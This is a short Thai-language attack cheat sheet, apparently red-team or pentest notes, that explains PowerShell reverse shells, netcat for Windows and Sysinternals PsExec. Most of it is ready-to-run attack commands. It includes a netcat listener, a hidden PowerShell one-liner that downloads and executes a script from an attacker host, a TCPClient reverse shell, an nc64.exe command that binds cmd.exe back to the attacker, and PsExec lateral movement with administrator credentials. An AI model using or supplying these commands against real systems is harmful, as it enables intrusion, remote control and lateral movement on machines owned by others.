คืออะไร: PowerShell reverse shell script ที่ใช้เชื่อมกลับมาหา attacker
คำสั่งตั้ง listener (ฝั่ง attacker):
nc -lvnp 4444
ฝั่งเป้าหมาย (เมื่อรันใน PowerShell):
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/Invoke-PowerShellTcp.ps1')"
หรือฝังใน payload:
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER-IP',4444);$stream = $client.GetStream();..."
คืออะไร: เครื่องมือ netcat สำหรับ Windows 64-bit ใช้สำหรับส่งข้อมูล TCP/UDP ระหว่างเครื่อง
การสร้าง reverse shell จาก Windows (ฝั่งเหยื่อ):
nc64.exe ATTACKER-IP 4444 -e cmd.exe
คำสั่งตั้ง listener (ฝั่ง attacker):
nc -lvnp 4444
คืออะไร: เป็นของ Microsoft Sysinternals ใช้รันคำสั่งบนเครื่องเป้าหมาย Windows แบบ remote
เหมาะกับ: ใช้หลังจากได้สิทธิ์ Domain Admin เพื่อรันคำสั่งบนเครื่องอื่น
คำสั่งพื้นฐาน:
PsExec64.exe \\192.168.1.10 -u Administrator -p Pass123 cmd.exe
อธิบาย:
\\ = ระบุเครื่องเป้าหมาย
-u = ชื่อผู้ใช้
-p = รหัสผ่าน
cmd.exe = เปิด shell บนเครื่องเป้าหมาย